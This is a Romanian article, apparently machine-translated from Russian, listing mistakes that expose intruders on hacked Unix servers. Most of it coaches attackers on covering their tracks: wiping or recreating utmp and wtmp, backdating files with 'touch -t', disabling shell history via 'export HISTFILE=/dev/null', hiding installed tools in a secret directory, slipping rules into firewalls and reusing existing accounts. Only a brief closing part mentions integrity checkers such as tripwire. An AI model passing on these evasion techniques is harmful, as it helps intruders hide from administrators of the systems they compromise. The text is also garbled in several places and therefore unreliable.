    Dacă curățarea jurnalelor de text nu provoacă hemoroizi anume, atunci procesarea fișierelor binare este oarecum mai dificilă. Aici nu puteți face fără logwiper-uri speciale care înțeleg structura următoarelor fișiere: /var/log/wtmp, /var/log/lastlog și /var/run/utmp.

    Hackerii rezolvă adesea problema cu o simplă comandă rm. Dar dacă administratorul vede că nu au existat utilizatori pe sistemul său în ultima lună, atacatorul nu se va simți mai bine. Puteți șterge numai fișierul utmp care afișează utilizatorii din sistem în în acest moment timp. După ștergere, ar trebui să urmeze comanda tactilă, creând din nou fișierul. Dacă acest lucru nu se face, binarul /usr/bin/w se va plânge de lipsa utmp, iar utilizatorii online nu vor fi înregistrați.

    2. Modificarea datei pe fișiere

    Data de pe fișiere este punctul slab al hackerului. Este până la data la care programele de monitorizare a sistemului determină instalarea unui rootkit sau modificările fișierelor de sistem. Puteți modifica data dintr-un fișier utilizând comanda touch cu parametrul -t, urmată de data în formatul: MonthDayHourMinuteYear. Crackerii uită foarte des să schimbe data înapoi la cea veche după editarea conf sau rescrierea binarului. Utilitarele administrative detectează rapid modificările din sistem și trimit un raport detaliat administratorului.

    3. Istoricul echipei

    Un atribut indispensabil al oricărui shell este stocarea istoricului comenzilor tastate de utilizator. Acest lucru se face pentru a putea repeta o comandă tastata anterior. Fișierul cu istoricul comenzilor este studiat în primul rând de un hacker la piratarea cu succes a sistemului pentru a obține informații inițiale despre activitățile administratorului sau pentru a extrage parole din programele consolei.

    Dar dacă te uiți din cealaltă parte, atunci administratorul poate fi paranoic, studiind în mod regulat propriul fișier istoric. Și dacă un hacker a săpat destul de mult în sistem, lăsând astfel un istoric al instalării de rootkit-uri sau DoSers, reacția administratorului este imprevizibilă. Prin urmare, fiecare hacker trebuie să-și acopere urmele în timp util.

    Locația fișierului istoric poate fi găsită prin variabila de mediu HISTFILE, vizualizând-o cu comanda consolei echo $HISTFILE. În consecință, după comanda export HISTFILE=/dev/null, scrierea comenzilor în fișier se va opri. Atenţie! Această tehnică funcționează doar pe durata sesiunii curente, așa că hackerul va trebui să execute comanda de fiecare dată când apare în sistem.

    4. Infectarea sistemului cu rootkit-uri

    Oricât de paradoxal ar părea, instalarea rootkit-urilor poate expune cu ușurință un hacker. În primul rând, atunci când înlocuiește fișierele de sistem, el, de regulă, face greșeala nr. 2, deoarece stabilirea datei inițiale pe o grămadă de fișiere binare este, pentru a spune ușor, lungă și antisportiv. În al doilea rând, dacă administratorul a setat noua versiune pachet (binutils, de exemplu), apoi instalarea celui vechi deasupra sistemului nu va duce la nimic bun. Mai mult, atacatorul poate oferi chei de comandă specificate prin alias. De exemplu, versiunea veche a /bin/ls nu înțelege cheia --colors și multe rootkit-uri conțin exact versiunile vechi rootkit pe un sistem nou, hackerul semnează automat propriul mandat de moarte.

    5. Instalarea software-ului

    După ce a spart un sistem, atacatorul își instalează adesea propriul software pe el, de exemplu, șosete sau nmap, ceea ce este destul de logic - avea nevoie de un sistem de testare și l-a primit. Dar chiar dacă procesele atacatorului sunt ascunse, atunci în acest caz administratorul poate detecta un port deschis 1080 în sistem. Apoi va ghici rapid ce se întâmplă și, prin urmare, va dezvălui deghizarea hackerului.

    De fapt, după hacking, atacatorul analizează activitățile administratorului și trage concluzii despre gradul de neglijare a serverului. Dar tot nu ar trebui să vă instalați programele în directoarele rădăcină. Pentru a evita acest lucru, hackerul trebuie să-și creeze propriul director ascuns separat și să instaleze tot software-ul de luptă în el. Acest lucru se realizează cu comanda ./configure --prefix=/path/to/hidden/xakep_dir la instalarea pachetelor.

    6. Scanarea dintr-un sistem piratat

    Cea mai frecventă greșeală dintre toate listate. La urma urmei, o scanare de pe un server corupt nu duce niciodată la nimic bun. Vedeți singuri: atacatorul scanează subrețeaua cu nmap sau alt scaner disponibil După care administratorul care respectă legea al rețelei scanate poate scrie o plângere pentru abuzul companiei cu care a fost efectuată scanarea, trimițând toate jurnalele care dovedesc faptul. Serviciul de securitate atribuit companiei la coadă ajunge la concluzia că serverul lor a fost stricat și l-au lovit în cap pe administrator .

    Desigur, această situație este departe de a fi tipică. Datorită inerției administratorilor noștri curajoși, hackerii scapă adesea cu scanarea. Dar rețineți că el poate avea probleme suplimentare prin desfășurarea activităților active de pe un server piratat.

    7. Schimbarea regulilor firewall

    Firewall-ul este o chestiune personală pentru administrator. Și dacă l-a instalat, se presupune că îi cunoaște toate regulile ca pe dosul mâinii. Dacă hackerul le personalizează după gustul său, atunci mai devreme sau mai târziu administratorul va opri aceste acțiuni. Excepția pot fi grămezi teribile de reguli, clar necompilate de administratorul de sistem. Adăugarea unei intrări discrete la acest amestec exploziv nu va provoca dezastru.

    Dacă firewall-ul conține mai multe reguli care pot fi citite de om și, judecând după HISTFILE, administratorul le monitorizează în mod regulat, atunci nu mai rămâne nimic de făcut decât să le respectați sau să schimbați sursele firewall-ului (pentru guru C). Apropo, aceasta este cea mai tare opțiune.

    8. Adăugarea de noi utilizatori

    O situație destul de tipică: după piratarea unui sistem, un hacker își împărtășește impresiile despre hack pe IRC sau ICQ. Lui cei mai buni prieteniîncep imediat să cerșească scoici pentru nevoi personale. După ce s-a gândit puțin, hackerul adaugă utilizatorul la sistem, asigurându-se că shell-ul nu este root, cum poate interfera cu mine. A doua zi, administratorul primește un raport de dimineață despre incidentele anormale din sistem și găsește o linie interesantă în el, de exemplu:

    Utilizatori noi:
    xakep:x:31337:31337:Xakep user:/home/xakep:/bin/bash

    Acum puteți spune la revedere unui cont root de pe o mașină spartă.

    Pentru a preveni acest lucru, nu ar trebui să existe utilizatori noi în sistem de la hacker. Cel mai bine este să testați puterea existentei conturiși folosiți-le.

    9. Admiterea în sistem a persoanelor neautorizate

    Această eroare este similară cu cea anterioară, dar există o diferență. Adesea, unui hacker i se cere să acceseze un server prin propriile uși din spate. După acordarea unui astfel de acces, vă puteți lua imediat rămas bun de la server. Toți oamenii sunt diferiți, iar un străin poate încălca cu ușurință toate regulile descrise mai sus într-o singură sesiune, rupându-ți astfel deghizarea în sistem.

    Un hacker competent nu creează niciodată astfel de situații. Mai mult decât atât, nu vorbește despre hacking nicăieri, punând întotdeauna propria siguranță pe primul loc. Încălcare a acestei reguli Acest lucru este posibil doar dacă sunteți convins că odată ce accesul este acordat, nu veți avea probleme inutile.

    10. Alegerea unei profesii de hacker

    Da, ai auzit bine! Un hacker este ca un sapator prima dată când face o greșeală este atunci când își alege profesia. Fiecare hack ar putea fi fatal pentru el și el însuși este conștient de acest lucru. Dar nu se poate împăca cu asta, considerând hacking-ul un sport extrem. Dacă încă vă întrebați dacă să fiți hacker sau nu, atunci vă voi da câteva sfaturi. NU! A fi hacker nu mai este atât de la modă și, în plus, este periculos. Deci, este mai bine să faceți altceva, de exemplu, să vindeți eseuri finale școlare în limba rusă prin internet :).

    Acestea, de fapt, sunt toate greșelile care duc la consecințe triste. Dar, repet încă o dată, toate aceste erori sunt relevante doar într-un sistem la cârma căruia stă un administrator conștiincios care își primește pe merit salariul. Pe serverele care rulează, în care administratorul monitorizează sistemul când este beat și numai în vacanțe, puteți face tot ce doriți - nu se va înrăutăți.

    Acest material este destinat să arate cazurile tipice în care hackerii uzurpă identitatea unui sistem piratat. Acest lucru nu ar trebui să fie considerat un ghid de acțiune. Înainte de a face ceva ireparabil, citește din nou punctul 10. Sunt încă atât de multe lucruri interesante pe lume :).

    Utilitare de urmărire sau ajutor administrativ

    Acest articol a menționat utilitarele de administrare de mai multe ori. Sunt programe care scanează sistemul zilnic (suma md5 de binare, modificări în confs, procese etc.) și compară modificările din baza lor de date. După care generează un raport și îl trimit administratorului. Programul în sine se blochează sub forma unui demon sau este lansat de crontab. Un exemplu de astfel de utilitate este programul tripwire.